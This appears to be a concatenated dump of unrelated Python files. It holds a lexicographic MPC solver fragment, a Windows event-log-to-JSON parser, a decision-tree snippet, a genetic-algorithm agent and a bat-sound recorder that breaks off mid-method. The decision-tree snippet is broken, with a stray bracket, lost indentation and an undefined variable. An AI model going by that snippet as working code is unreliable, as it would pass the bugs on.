    problem: problem definition, contains xinit, x0, all_params for the solver
    behavior_init, behavior_first, behavior_second, behavior_third:
        cost-function parameters for the warm-up solve and the three levels
    k: current index in the simulation
    lexi_iter: number of lexicographic levels to run
    next_spline_points: spline points for the player
    solver_it_lexi, solver_time_lexi, solver_cost_lexi: arrays for solver stats
    sim_params: simulation parameters (provides safety_slack / safety_lat margins)

    Returns (temp, problem, p_vector) where ``temp`` is the last solution
    reshaped to (nvar, N) in column-major order.
    """
    # Warm-up solve at the first simulation step only, to get a feasible
    # starting point before the lexicographic passes.
    if k == 0:
        output, problem, p_vector = solve_optimization(
            model, solver, num_players, problem, behavior_init, k, 0,
            next_spline_points, solver_it_lexi, solver_time_lexi,
            solver_cost_lexi, behavior_init[p_idx.OptCost1],
            behavior_init[p_idx.OptCost2])
        # Warm-start: shift the solution forward by one stage.
        problem["x0"][0: model.nvar * (model.N - 1)] = output["all_var"][model.nvar:model.nvar * model.N]
    # Lexicographic simulation
    for lex_level in range(lexi_iter):
        if lex_level == 0:
            # Level 0: solve with the first-priority objective.
            output, problem, p_vector = solve_optimization(
                model, solver, num_players, problem, behavior_first,
                k, lex_level, next_spline_points, solver_it_lexi,
                solver_time_lexi, solver_cost_lexi,
                behavior_first[p_idx.OptCost1],
                behavior_first[p_idx.OptCost2])
            problem["x0"][0: model.nvar * (model.N - 1)] = output["all_var"][model.nvar:model.nvar * model.N]
            temp = output["all_var"].reshape(model.nvar, model.N, order='F')
            row, col = temp.shape
            # Sum each player's terminal cumulative slack cost; it bounds level 1.
            slackcost = 0
            for zz in range(num_players):
                upd_s_idx = zz * params.n_states + (num_players - 1) * params.n_inputs
                slackcost = slackcost + temp[params.x_idx.CumSlackCost + upd_s_idx, col - 1]
        elif lex_level == 1:
            # Level 1: re-solve with the level-0 slack cost (plus margin) as bound.
            output, problem, p_vector = solve_optimization(
                model, solver, num_players, problem, behavior_second,
                k, lex_level, next_spline_points, solver_it_lexi,
                solver_time_lexi, solver_cost_lexi,
                slackcost + sim_params.safety_slack,
                behavior_second[p_idx.OptCost2])
            problem["x0"][0: model.nvar * (model.N - 1)] = output["all_var"][model.nvar:model.nvar * model.N]
            temp = output["all_var"].reshape(model.nvar, model.N, order='F')
            row, col = temp.shape
            # Terminal cumulative lateral-speed (rules) cost; bounds level 2.
            cumlatcost = 0
            for zz in range(num_players):
                upd_s_idx = zz * params.n_states + (num_players - 1) * params.n_inputs
                cumlatcost = cumlatcost + temp[params.x_idx.CumLatSpeedCost + upd_s_idx, col - 1]
            # Re-extract the slack cost from this level's solution.
            slackcost = 0
            for zz in range(num_players):
                upd_s_idx = zz * params.n_states + (num_players - 1) * params.n_inputs
                slackcost = slackcost + temp[params.x_idx.CumSlackCost + upd_s_idx, col - 1]
        else:
            # Final level: both previous optimal costs (plus margins) as bounds.
            output, problem, p_vector = solve_optimization(
                model, solver, num_players, problem, behavior_third,
                k, lex_level, next_spline_points, solver_it_lexi,
                solver_time_lexi, solver_cost_lexi,
                slackcost + sim_params.safety_slack, cumlatcost + sim_params.safety_lat)
            # Extract output and initialize next iteration with current solution shifted by one stage
            problem["x0"][0: model.nvar * (model.N - 1)] = output["all_var"][model.nvar:model.nvar * model.N]
            problem["x0"][model.nvar * (model.N - 1): model.nvar * model.N] = output["all_var"][model.nvar * (
                    model.N - 1):model.nvar * model.N]
            temp = output["all_var"].reshape(model.nvar, model.N, order='F')
    return temp, problem, p_vector
| StarcoderdataPython |
3310175 | import logging
import re
import argparse
import glob
import json
import time
import sys
import win32evtlog
import win32api
import win32con
import pywintypes
import os
# Supported serialisation formats for --output-format (currently JSON only).
OUTPUT_FORMATS = "json".split(" ")
# Language-neutral LANGID used when formatting event message strings.
LANGID = win32api.MAKELANGID(win32con.LANG_NEUTRAL, win32con.SUBLANG_NEUTRAL)
# source name -> {dll name: module handle} of loaded message-table DLLs.
DLLCACHE = {}
# "SourceName/EventID" -> dll name that formats it (None = no DLL found).
DLLMSGCACHE = {}
LOGGER = logging.getLogger("kpulp")
LOGGER.setLevel(logging.INFO)
logging.basicConfig(
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
def loadDLLsInCache(directory=None):
    """Populate DLLCACHE with message-table DLL handles.

    If *directory* is given it is expected to contain one sub-directory per
    event source, each holding that source's message DLLs (the layout
    produced by dllraider). Otherwise the local registry's EventLog service
    keys are enumerated to discover each source's EventMessageFile DLLs.
    """
    if directory:
        for source in os.listdir(directory):
            dirpath = os.path.join(directory, source)
            if os.path.isdir(dirpath):
                for e in os.listdir(dirpath):
                    if e.lower().endswith(".dll"):
                        dllPath = os.path.join(dirpath, e)
                        LOGGER.debug(
                            "Loading {} for {}".format(dllPath, source))
                        if source not in DLLCACHE:
                            DLLCACHE[source] = {}
                        try:
                            dllHandle = loadDLL(dllPath)
                            DLLCACHE[source][e] = dllHandle
                        except pywintypes.error as exc:
                            # BUG FIX: the original logged the filename
                            # variable `e` instead of the caught exception.
                            LOGGER.warn(
                                "Error loading {}: {}".format(dllPath, exc))
        return
    # No extra directory given: discover the DLLs from the registry.
    # (BUG FIX: removed a leftover `from IPython import embed; embed()`
    # debug hook that blocked this code path in an interactive shell.)
    keyName = u'SYSTEM\\CurrentControlSet\\Services\\EventLog'
    h1 = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, keyName)
    for (typeName, _, __, ___) in win32api.RegEnumKeyEx(h1):
        keyName = u'SYSTEM\\CurrentControlSet\\Services\\EventLog\\{}'.format(
            typeName)
        h2 = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, keyName)
        for (sourceName, _, __, ___) in win32api.RegEnumKeyEx(h2):
            keyName = u'SYSTEM\\CurrentControlSet\\Services\\EventLog\\{}\\{}'.format(
                typeName, sourceName)
            h3 = win32api.RegOpenKeyEx(
                win32con.HKEY_LOCAL_MACHINE, keyName, 0, win32con.KEY_READ)
            LOGGER.debug("Enumerating {}".format(keyName))
            try:
                dllNames = win32api.RegQueryValueEx(
                    h3, "EventMessageFile")[0].split(";")
                if sourceName not in DLLCACHE:
                    DLLCACHE[sourceName] = {}
                for dllName in dllNames:
                    if dllName:
                        dllHandle = loadDLL(dllName)
                        DLLCACHE[sourceName][dllName] = dllHandle
            except pywintypes.error as e:
                if e.args[0] == 2:  # value not found: source has no message file
                    pass
                else:
                    raise e
def loadDLL(dllName):
    """Expand environment variables in *dllName* and load it as a
    data-file-only library, returning the module handle."""
    expanded = win32api.ExpandEnvironmentStrings(dllName)
    LOGGER.debug("Loading library {}".format(expanded))
    return win32api.LoadLibraryEx(
        expanded, 0, win32con.LOAD_LIBRARY_AS_DATAFILE)
def expandString(event):
    """Expand an event record's message text via the cached message-table DLLs.

    First consults DLLMSGCACHE for the DLL already known to format this
    (SourceName, EventID) pair; on a cache miss it probes every DLL loaded
    for the source and memoizes the one that succeeds. Returns the formatted
    message, or "" when no DLL can expand it (memoized as None).
    """
    cachekey = event.SourceName + "/" + str(event.EventID)
    try:
        if cachekey in DLLMSGCACHE:
            dllName = DLLMSGCACHE[cachekey]
            if dllName is None:
                return ""
            try:
                dllHandle = DLLCACHE[event.SourceName][dllName]
            except KeyError:
                # BUG FIX: the original dropped into an IPython embed() here
                # and then used the undefined dllHandle. Treat a stale cache
                # entry as "cannot expand" and forget the mapping instead.
                LOGGER.warn("Cached DLL {} for {} is no longer loaded".format(
                    dllName, event.SourceName))
                DLLMSGCACHE[cachekey] = None
                return ""
            data = win32api.FormatMessageW(win32con.FORMAT_MESSAGE_FROM_HMODULE,
                                           dllHandle, event.EventID, LANGID, event.StringInserts)
            return data
        elif event.SourceName not in DLLCACHE:
            # BUG FIX: the original message had no {} placeholders, so the
            # .format() arguments were silently dropped from the log line.
            LOGGER.warn("Event source {} not in cache (EventID: {})".format(
                event.SourceName, event.EventID))
            DLLMSGCACHE[cachekey] = None
        else:
            for (dllName, dllHandle) in DLLCACHE[event.SourceName].items():
                try:
                    data = win32api.FormatMessageW(win32con.FORMAT_MESSAGE_FROM_HMODULE,
                                                   dllHandle, event.EventID, LANGID, event.StringInserts)
                    DLLMSGCACHE[cachekey] = dllName
                    return data
                except (win32api.error, SystemError):
                    pass  # message not in this DLL; try the next one
    except pywintypes.error:
        pass
    LOGGER.warn("Unable to expand data for {} EventID: {}".format(
        event.SourceName, event.EventID))
    DLLMSGCACHE[cachekey] = None  # no DLLs known to expand this message
    return ""
def readevents(path):
    """Generator yielding one dict per record from a saved event-log file.

    Opens *path* as a backup event log and reads it sequentially backwards
    (EVENTLOG_BACKWARDS_READ). Each yielded dict carries the record header
    fields, the raw string inserts joined with "|" under 'data', and the
    expanded message under 'Description' (plus the parsed per-field keys
    and a 'Short Description' first line when expansion succeeds).
    """
    logHandle = win32evtlog.OpenBackupEventLog(None, path) # None=NULL means local host
    flags = win32evtlog.EVENTLOG_BACKWARDS_READ | win32evtlog.EVENTLOG_SEQUENTIAL_READ
    total = win32evtlog.GetNumberOfEventLogRecords(logHandle)
    LOGGER.info("Total number of records for {} is: {}".format(path, total))
    # Dead code kept for reference: log-type guessing from the file name.
    # if "security" in path.lower():
    #     logType = "Security"
    # elif "application" in path.lower():
    #     logType = "Application"
    # elif "system" in path.lower():
    #     logType = "System"
    # else:
    #     LOGGER.error("Unknown log type - put something in path")
    #     sys.exit(-1)
    event_dict = None
    # ReadEventLog returns records in batches; an empty batch means EOF.
    while True:
        events = win32evtlog.ReadEventLog(logHandle, flags, 0)
        if events:
            for event in events:
                event_dict = {}
                # "%#c" is the Windows strftime flag for a locale date/time
                # without leading zeros.
                event_dict['TimeGenerated'] = time.strftime(
                    "%#c", time.localtime(int(event.TimeGenerated)))
                event_dict['SourceName'] = event.SourceName
                event_dict['Id'] = event.EventID
                event_dict['EventType'] = event.EventType
                event_dict['ComputerName'] = event.ComputerName
                if event.StringInserts:
                    event_dict['data'] = "|".join(event.StringInserts)
                description = expandString(event)
                event_dict['Description'] = description
                if description:
                    # Promote the "Key: value" lines to top-level dict fields.
                    event_dict.update(description_to_fields(description))
                    first_line = description.split("\r\n")[0]
                    event_dict['Short Description'] = first_line
                yield event_dict
        else:
            break
def description_to_fields(description):
    """Parse an event description's "Key:<tabs>Value" lines into a dict.

    Windows event descriptions repeat field names under different section
    headers, e.g.::

        Subject:
            Security ID:    S-1-5-21-...
            Account Name:   joebloggs
        Account For Which Logon Failed:
            Security ID:    NULL SID
            Account Name:   administrator

    A bare "Something:" line opens a section whose name prefixes the keys
    of the indented lines that follow ("Subject Security ID", ...), so the
    repeats stay distinct; an empty line closes the section. Spaces in the
    final keys become underscores (keeps timelion/elasticsearch happy).
    """
    event_dict = {}
    prefix = ''
    for l in description.split("\r\n"):
        # Section header: a line of words ending in ":" with nothing after.
        m = re.match(r"^([A-Za-z ]+):\s*$", l)
        if m:
            prefix = m.group(1)
            continue
        if prefix and l == '':  # blank line ends the current section
            prefix = ''
            continue
        # Field line: optional tabs, key, colon, at least one tab, value.
        m = re.match(r"^\t*([A-Za-z ]+):\t{1,}(.+)", l)
        if m:
            (k, v) = m.groups()
            new_key = prefix + " " + k if prefix else k
            if new_key in event_dict:
                # BUG FIX: the original had three {} placeholders but only
                # two format args, so this warning raised IndexError.
                LOGGER.warn(
                    "Key {} already in dict with value: {} ({})".format(
                        new_key, event_dict[new_key], v))
            event_dict[new_key.replace(" ", "_")] = v
    return event_dict
def main():
    """Command-line entry point: convert saved event logs to JSON lines."""
    parser = argparse.ArgumentParser(description='Parse EVTX files')
    parser.add_argument('--output', "-o", metavar='OUTPUT', type=str,
                        help='Destination, if - then STDOUT (default)', default='-')
    parser.add_argument('logfiles', metavar='LOGFILE.evtx', type=str, nargs='+',
                        help='List of logfiles to parse. Will expand wildcards.')
    parser.add_argument('--output-format', "-f", type=str, dest="format", choices=OUTPUT_FORMATS,
                        default="json",
                        help='Output format, choices are:' + ",".join(OUTPUT_FORMATS))
    parser.add_argument('--additional-dlls', type=str, dest="extradllpath",
                        help='Directory with additional DLLs to load (as created by dllraider)')
    parser.add_argument('--debug', "-d", action="store_true",
                        help='Debug level messages')
    args = parser.parse_args()
    if args.debug:
        LOGGER.setLevel(logging.DEBUG)
    if args.output == "-":
        output = sys.stdout
    else:
        output = open(args.output, "wb")
    try:
        loadDLLsInCache(args.extradllpath)
        # Expand wildcards in every LOGFILE argument and flatten the result.
        all_logs = [item for sublist in [
            glob.glob(k) for k in args.logfiles] for item in sublist]
        for lf in all_logs:
            LOGGER.info("Processing {}".format(lf))
            try:
                for record in readevents(lf):
                    if args.format == "json":
                        txt = json.dumps(record) + "\r\n"
                        output.write(txt)
                        LOGGER.debug(txt)
            except pywintypes.error as e:
                LOGGER.error(str(e))
    finally:
        # BUG FIX: the output file was never closed (leaked when --output
        # names a file). Never close stdout itself.
        if output is not sys.stdout:
            output.close()
# Script entry point.
if __name__ == '__main__':
    main()
| StarcoderdataPython |
9753503 | <filename>RefMaterials/Machine-Learning/decision-tree.py
def entropy(class_probabilities):
return sum(-p * math.log(p,2)
for p in class_probabilities
if p) #ignore zero probability
def class_probabilities(labels):
total_count = len(labels)
return [count / total_count
for count in Counter(labels).values()]
def data_entropy(labeled_data):
labels = [label for _, label in labeled_data]
probabilities = class_probabilities(labels)
return entropy(probabilities)]
def partition_entropy(subsets):
total_count = sum(len(subset) for subset in subsets)
return sum(data_entropy(subset) * len(subset) / total_count
for subset in subsets)
#ID3 algorithm
#if all same label make leaf node
#
#choose partition with the lowest entropy
#add decision node based on chosen atribute
#recur on subset
def partition_by(inputs, attribute):
groups = defaultdict(list)
for input in inputs:
key = input[0][attribute]
groups[key].append(input)
return groups
def partition_entropy_by(inputs, attribute):
partitions = partition_by(inputs, attribute)
return partition_entropy(partition.values())
# | StarcoderdataPython |
275378 | <filename>physical_arm_learning/genetic_agent.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 10 16:13:27 2020
@author: stan
"""
import numpy as np
class GeneticAgent(object):
"""
old_generation is a list of vector, reward pairs
"""
def __init__(self, p_mutation, p_crossover, p_replication, diversity_factor,
max_mutations, max_cross, coordinate_range, reward_th):
np.random.seed()
# Probabilities of mutation, crossover and replication
self.p_mutation = p_mutation
self.p_crossover = p_crossover
self.p_replication = p_replication
# Diversity factor - sets how much diversity is preferred over highest
# reward
self.diversity_factor = diversity_factor
# Maximum number of mutations and fields that are crossed over
self.max_mutations = max_mutations
self.max_cross = max_cross
# Limits on each entry in the array
self.coordinate_range = coordinate_range
# Threshold on the reward when to stop forcing diversity
self.reward_th = reward_th
def get_new_generation(self, old_generation):
# sorts the generation by reward it got
# -1 is to sort it in descending order
old_generation = old_generation[((-1)*old_generation[:,1]).argsort()]
# always copy the top performer
old_vectors = list(old_generation[:,0])
new_generation = np.array([old_generation[0][0]])
# when reached high reward for an extended period, stop forcing diversity
if old_generation[0][1] >= self.reward_th:
self.diversity_factor = 0
while len(new_generation)!=len(old_generation):
# Randomly choose the genetic alteration applied
genetic_type = np.random.choice(['mut', 'cross', 'repl'],
p=[self.p_mutation,
self.p_crossover,
self.p_replication])
# Find vector choice probabilities based on rewards and diversity
vec_choice_probabilities = list(self.get_choice_probabilities(old_generation,
new_generation))
# Choose 2 vectors for the next genetic operation - possibly only
# one of them will be used
vec1_idx, vec2_idx = np.random.choice(len(old_vectors), size=2, replace=False, p=vec_choice_probabilities)
vec1 = old_vectors[vec1_idx]
vec2 = old_vectors[vec2_idx]
if genetic_type=='mut':
#print('mutating')
new_generation = np.concatenate((new_generation, [self.apply_mutation(vec1)]))
if genetic_type=='repl':
#print('replicating')
new_generation = np.concatenate((new_generation, [vec1]))
if genetic_type=='cross':
#print('crossing')
vec1, vec2 = self.apply_crossover(vec1, vec2)
new_generation = np.concatenate((new_generation, [vec1]))
if len(new_generation)<len(old_generation):
new_generation = np.concatenate((new_generation, [vec2]))
return new_generation
def measure_diversity(self, vec, vec_list):
# measure average euclidean distance from a vector to the list of
# already chosen vectors - ensures exploration
distances = []
for y in vec_list:
distances.append(np.linalg.norm(vec-y))
diversity = np.average(distances)
return diversity
def get_choice_probabilities(self, old_generation, new_generation):
# list of the second element
rewards = old_generation[:,1]
diversified_rewards = rewards + np.array([self.measure_diversity(vec, new_generation)*
self.diversity_factor for vec in old_generation[:,0]])
probabilities = diversified_rewards/np.sum(diversified_rewards)
return probabilities
def apply_mutation(self, vec):
# Get the number of fields to mutate
no_mutations = np.random.randint(1, self.max_mutations+1)
# Get the indices of the fields to mutate
idx_to_mutate = np.random.choice(len(vec), no_mutations, replace=False)
# Mutation is changing a value of a field to a random value
# Coordinate ranges hold the range that variable can take, bounded to
# accelerate learning
for idx in idx_to_mutate:
coordinate_range = self.coordinate_range[idx]
vec[idx] = np.random.sample()*(coordinate_range[1]-coordinate_range[0])+coordinate_range[0]
return vec
def apply_crossover(self, vec1, vec2):
# Get the number of fields to cross over
no_cross = np.random.randint(1, self.max_cross+1)
# Get the indices of the fields to cross over
idx_to_cross = np.random.choice(len(vec1), no_cross, replace=False)
for idx in idx_to_cross:
temp = vec1[idx]
vec1[idx] = vec2[idx]
vec2[idx] = temp
return vec1, vec2
def get_nearby_trajectory(self, vec, idx1=0, idx2=-1):
# Modify the trajectory between given indices
new_trajectory = (np.random.random()*0.1+0.95)*vec
return new_trajectory
def f(x, y):
return np.exp(-(x*x+y*y))*(np.cos(2*np.pi*x)**2)*(np.cos(2*np.pi*y)**2)
def main():
generation = []
xrange = [-2.0, 2.0]
yrange = [-2.0, 2.0]
for i in range(15):
generation.append([np.random.random()*(xrange[1]-xrange[0])+xrange[0],
np.random.random()*(yrange[1]-yrange[0])+yrange[0]])
geneticAgent = GeneticAgent(0.4, 0.3, 0.3, 0.3, 1, 1, [xrange, yrange], 0.9)
for itr in range(0, 100):
rewarded_generation = []
for sample in generation:
rewarded_generation.append([sample, f(sample[0], sample[1])])
rewarded_generation = np.array(rewarded_generation)
generation = geneticAgent.get_new_generation(rewarded_generation)
print(rewarded_generation)
print(max(rewarded_generation[:, 1]))
if __name__=='__main__':
main()
| StarcoderdataPython |
8020631 | #!/usr/bin/python3
# -*- coding:utf-8 -*-
# Project: http://cloudedbats.org
# Copyright (c) 2016-2018 <NAME>
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
import os
import logging
import time
import wave
import pyaudio
import wurb_core
def default_settings():
""" Available settings for the this module.
This info is used to define default values and to
generate the wurb_settings_DEFAULT.txt file."""
description = [
'# Settings for the sound recorder.',
]
default_settings = [
{'key': 'rec_directory_path', 'value': '/media/usb0/wurb1_rec'},
{'key': 'rec_filename_prefix', 'value': 'WURB1'},
{'key': 'rec_format', 'value': 'FS'}, # "TE" (Time Expansion) ot "FS" (Full Scan).
{'key': 'rec_max_length_s', 'value': '20'},
{'key': 'rec_buffers_s', 'value': 2.0}, # Pre- and post detected sound buffer size.
# Hardware.
{'key': 'rec_sampling_freq_khz', 'value': '384'},
{'key': 'rec_microphone_type', 'value': 'USB'}, # "USB" or "M500".
{'key': 'rec_part_of_device_name', 'value': 'Pettersson'},
{'key': 'rec_device_index', 'value': 0}, # Not used if "rec_part_of_device_name" is found.
]
developer_settings = [
{'key': 'rec_source_debug', 'value': 'N'},
{'key': 'rec_proc_debug', 'value': 'N'},
{'key': 'rec_target_debug', 'value': 'N'},
{'key': 'rec_source_adj_time_on_drift', 'value': 'Y'},
]
#
return description, default_settings, developer_settings
def get_device_list():
""" Sound source util. Check connected sound cards. """
py_audio = pyaudio.PyAudio()
device_list = []
device_count = py_audio.get_device_count()
for index in range(device_count):
info_dict = py_audio.get_device_info_by_index(index)
# Sound card for input only.
if info_dict['maxInputChannels'] != 0:
device_list.append(info_dict['name'])
#
return device_list
def get_device_index(part_of_device_name):
""" Sound source util. Lookup for device by name. """
py_audio = pyaudio.PyAudio()
device_count = py_audio.get_device_count()
for index in range(device_count):
info_dict = py_audio.get_device_info_by_index(index)
if part_of_device_name in info_dict['name']:
return index
#
return None
class WurbRecorder(object):
""" """
def __init__(self, callback_function=None):
""" """
self._callback_function = callback_function
self._logger = logging.getLogger('CloudedBatsWURB')
self._settings = wurb_core.WurbSettings()
#
self._sound_manager = None
# self._is_recording = False
def setup_sound_manager(self):
""" """
# Sound stream parts:
# - Source
self._sound_source = None
if self._settings.text('rec_microphone_type') == 'M500':
# The Pettersson M500 microphone is developed for Windows. Special code to handle M500.
self._sound_source = wurb_core.SoundSourceM500(callback_function=self._callback_function)
else:
# Generic USB microphones, including Pettersson M500-384.
self._sound_source = wurb_core.SoundSource(callback_function=self._callback_function)
# - Process.
self._sound_process = wurb_core.SoundProcess(callback_function=self._callback_function)
# - Target.
self._sound_target = wurb_core.SoundTarget(callback_function=self._callback_function)
# - Manager.
self._sound_manager = wurb_core.SoundStreamManager(
self._sound_source,
self._sound_process,
self._sound_target)
def start_recording(self):
""" """
if self._sound_manager:
self._sound_manager.start_streaming()
def stop_recording(self, stop_immediate=False):
""" """
if self._sound_manager:
self._sound_manager.stop_streaming(stop_immediate)
class SoundSource(wurb_core.SoundSourceBase):
""" Subclass of SoundSourceBase. """
def __init__(self, callback_function=None):
""" """
self._callback_function = callback_function
self._logger = logging.getLogger('CloudedBatsWURB')
self._settings = wurb_core.WurbSettings()
#
super(SoundSource, self).__init__()
#
self._debug = self._settings.boolean('rec_source_debug')
self._rec_source_adj_time_on_drift = self._settings.boolean('rec_source_adj_time_on_drift')
#
self._pyaudio = pyaudio.PyAudio()
self._stream = None
#
self.read_settings()
def read_settings(self):
""" Called from base class. """
if self._settings.text('rec_microphone_type') == 'M500':
# For Pettersson M500. Overrides settings.
self._sampling_freq_hz = 500000
else:
# From settings. Defaults for Pettersson M500-384.
self._sampling_freq_hz = self._settings.integer('rec_sampling_freq_khz') * 1000
# Sound card.
in_device_name = self._settings.text('rec_part_of_device_name')
in_device_index = self._settings.integer('rec_device_index') # Default=0. First recognized sound card.
if in_device_name:
self._in_device_index = wurb_core.get_device_index(in_device_name)
else:
self._in_device_index = in_device_index
self._logger.info('Recorder: Sampling frequency (hz): ' + str(self._sampling_freq_hz))
def _setup_pyaudio(self):
""" """
# Initiate PyAudio.
try:
self._stream = self._pyaudio.open(
format = self._pyaudio.get_format_from_width(2), # 2=16 bits.
channels = 1, # 1=Mono.
rate = self._sampling_freq_hz,
frames_per_buffer = self._sampling_freq_hz, # Buffer 1 sec.
input = True,
output = False,
input_device_index = self._in_device_index,
start = False,
)
except Exception as e:
self._stream = None
self._logger.error('Recorder: Failed to create stream: ' + str(e))
# Report to state machine.
if self._callback_function:
self._callback_function('rec_source_error')
return
def source_exec(self):
""" Called from base class. """
if self._stream is None:
self._setup_pyaudio()
#
if self._stream:
self._active = True
self._stream_active = True
self._stream_time_s = time.time()
self._stream.start_stream()
else:
self._logger.error('Recorder: Failed to read stream.')
return
#
buffer_size = int(self._sampling_freq_hz / 2)
# Main source loop.
try:
data = self._stream.read(buffer_size) #, exception_on_overflow=False)
while self._active and data:
# Add time and check for time drift.
self._stream_time_s += 0.5 # One buffer is 0.5 sec.
if (self._stream_time_s > (time.time() + 10)) or \
(self._stream_time_s < (time.time() - 10)):
#
time_diff_s = int(time.time() - self._stream_time_s)
if self._rec_source_adj_time_on_drift:
self._logger.warning('Recorder: Rec. time adjusted. Diff: ' + str(time_diff_s) + ' sec.')
self._stream_time_s = time.time()
else:
self._logger.debug('Recorder: Rec. time drift. Diff: ' + str(time_diff_s) + ' sec.')
# Push time and data buffer.
self.push_item((self._stream_time_s, data))
#
data = self._stream.read(buffer_size) #, exception_on_overflow=False)
except Exception as e:
self._logger.error('Recorder: Failed to read stream: ' + str(e))
# Main loop terminated.
self._logger.debug('Source: Source terminated.')
self.push_item(None)
#
if self._stream is not None:
try:
self._stream.stop_stream()
self._stream.close()
except:
self._logger.error('Recorder: Pyaudio stream stop/close failed.')
self._stream = None
class SoundSourceM500(SoundSource):
""" Subclass of SoundSource for the Pettersson M500 microphone. """
def __init__(self, callback_function=None):
""" """
super(SoundSourceM500, self).__init__(callback_function)
#
self._debug = self._settings.boolean('rec_source_debug')
self._rec_source_adj_time_on_drift = self._settings.boolean('rec_source_adj_time_on_drift')
#
self._m500batmic = None
def source_exec(self):
""" For the Pettersson M500 microphone. """
self._active = True
#
try:
if not self._m500batmic:
self._m500batmic = wurb_core.PetterssonM500BatMic()
#
self._stream_active = True
#
self._stream_time_s = time.time()
self._m500batmic.start_stream()
self._m500batmic.led_on()
except Exception as e:
self._logger.error('Recorder: Failed to create stream: ' + str(e))
# Report to state machine.
if self._callback_function:
self._callback_function('rec_source_error')
return
#
# buffer_size = int(self._sampling_freq_hz / 2)
buffer_size = int(self._sampling_freq_hz)
# Main source loop.
data = self._m500batmic.read_stream().tostring()
data_array = data
while self._active and (len(data) > 0):
# Push 0.5 sec each time. M500 can't deliver that size directly.
if len(data_array) >= buffer_size:
# Add time and check for time drift.
self._stream_time_s += 0.5 # One buffer is 0.5 sec.
if (self._stream_time_s > (time.time() + 10)) or \
(self._stream_time_s < (time.time() - 10)):
#
time_diff_s = int(time.time() - self._stream_time_s)
if self._rec_source_adj_time_on_drift:
self._logger.warning('Recorder: Rec. time adjusted. Diff: ' + str(time_diff_s) + ' sec.')
self._stream_time_s = time.time()
else:
self._logger.debug('Recorder: Rec. time drift. Diff: ' + str(time_diff_s) + ' sec.')
# Push time and data buffer.
self.push_item((self._stream_time_s, data_array[0:buffer_size]))
data_array = data_array[buffer_size:]
#
data = self._m500batmic.read_stream().tostring()
data_array += data
#
self._logger.debug('Source M500: Source terminated.')
self.push_item(None)
#
self._m500batmic.stop_stream()
class SoundProcess(wurb_core.SoundProcessBase):
""" Subclass of SoundProcessBase. """
def __init__(self, callback_function=None):
""" """
self._callback_function = callback_function
self._logger = logging.getLogger('CloudedBatsWURB')
self._settings = wurb_core.WurbSettings()
#
super(SoundProcess, self).__init__()
#
self._debug = self._settings.boolean('rec_proc_debug')
self._rec_buffers_s = self._settings.float('rec_buffers_s')
def process_exec(self):
""" Called from base class. """
self._active = True
# Get sound detector based on user settings.
sound_detector = None
try:
sound_detector = wurb_core.SoundDetector().get_detector()
except Exception as e:
sound_detector = None
self._logger.error('Recorder: SoundDetector exception: ', str(e))
sound_detected = False
#
buffer_size = int(self._rec_buffers_s * 2.0) # Buffers are of 0.5 sec length.
#
silent_buffer = []
silent_counter = 9999 # Don't send before sound detected.
try:
while self._active:
time_and_data = self.pull_item()
if time_and_data is None:
self._logger.debug('Rec-process terminated.')
self._active = False
# Terminated by previous step.
self.push_item(None)
else:
# self.process_buffer(raw_data)
try:
sound_detected = sound_detector.check_for_sound(time_and_data)
except Exception as e:
sound_detected = True
#
if sound_detected:
if self._debug:
print('DEBUG: Sound detected.')
# Send pre buffer if this is the first one.
if len(silent_buffer) > 0:
for silent_time_and_data in silent_buffer:
self.push_item(silent_time_and_data)
#
silent_buffer = []
# Send buffer.
self.push_item(time_and_data)
silent_counter = 0
else:
if self._debug:
print('DEBUG: Sound not detected. Counter: ', silent_counter)
if silent_counter < buffer_size: # Unit 0.5 sec.
# Send after sound detected.
self.push_item(time_and_data)
silent_counter += 1
elif silent_counter < (buffer_size * 2): # Unit 0.5 sec.
# Accept longer silent part between pulses.
silent_buffer.append(time_and_data)
silent_counter += 1
else:
# Silent, but store in pre buffer.
self.push_item(False)
silent_buffer.append(time_and_data)
while len(silent_buffer) > buffer_size: # Unit 0.5sec.
silent_buffer.pop(0)
except Exception as e:
self._logger.error('Recorder: Sound process_exec exception: ', str(e))
class SoundTarget(wurb_core.SoundTargetBase):
    """Subclass of SoundTargetBase: final stage of the recording chain.

    Consumes (time, data) items from the previous stage and writes them to
    WAV files via WaveFileWriter. A ``False`` item marks silence (closes the
    current file); ``None`` terminates the loop. Files are rolled over when
    the configured maximum recording length is reached.
    """
    def __init__(self, callback_function=None):
        """Read output/file settings; callback_function is notified on errors."""
        self._callback_function = callback_function
        self._logger = logging.getLogger('CloudedBatsWURB')
        self._settings = wurb_core.WurbSettings()
        #
        super(SoundTarget, self).__init__()
        # From settings.
        self._dir_path = self._settings.text('rec_directory_path')
        self._filename_prefix = self._settings.text('rec_filename_prefix')
        rec_max_length_s = self._settings.integer('rec_max_length_s')
        # Internal unit is 0.5-second buffers, hence the factor 2.
        self._rec_max_length = rec_max_length_s * 2
        # Default for latitude/longitude in the decimal degree format.
        self._latitude = float(self._settings.float('default_latitude'))
        self._longitude = float(self._settings.float('default_longitude'))
        # Different microphone types.
        if self._settings.text('rec_microphone_type') == 'M500':
            # For M500 only. TE = time expansion, FS = full spectrum.
            if self._settings.text('rec_format') == 'TE':
                self._filename_rec_type = 'TE500'
                self._out_sampling_rate_hz = 50000
            else:
                self._filename_rec_type = 'FS500'
                self._out_sampling_rate_hz = 500000
        else:
            # For standard USB, inclusive M500-384.
            if self._settings.text('rec_format') == 'TE':
                self._filename_rec_type = 'TE' + self._settings.text('rec_sampling_freq_khz')
                # TE plays back 10x slower: kHz * 1000 / 10 = * 100.
                self._out_sampling_rate_hz = self._settings.integer('rec_sampling_freq_khz') * 100
            else:
                self._filename_rec_type = 'FS' + self._settings.text('rec_sampling_freq_khz')
                self._out_sampling_rate_hz = self._settings.integer('rec_sampling_freq_khz') * 1000
        #
        self._total_start_time = None
        self._internal_buffer_list = []
        self._write_thread_active = False
        self._active = False
    def target_exec(self):
        """Called from base class. Main consumer loop: buffer and write items."""
        self._active = True
        wave_file_writer = None
        # Use buffer to increase write speed.
        item_list = []
        item_list_max = 5  # Unit 0.5 sec. Before flush to file.
        item_counter = 0
        #
        try:
            while self._active:
                item = self.pull_item()
                # "None" indicates terminate by previous part in chain.
                if item is None:
                    self._active = False  # Terminated by previous step.
                    continue
                # "False" indicates silent part. Close file until not silent.
                elif item is False:
                    if wave_file_writer:
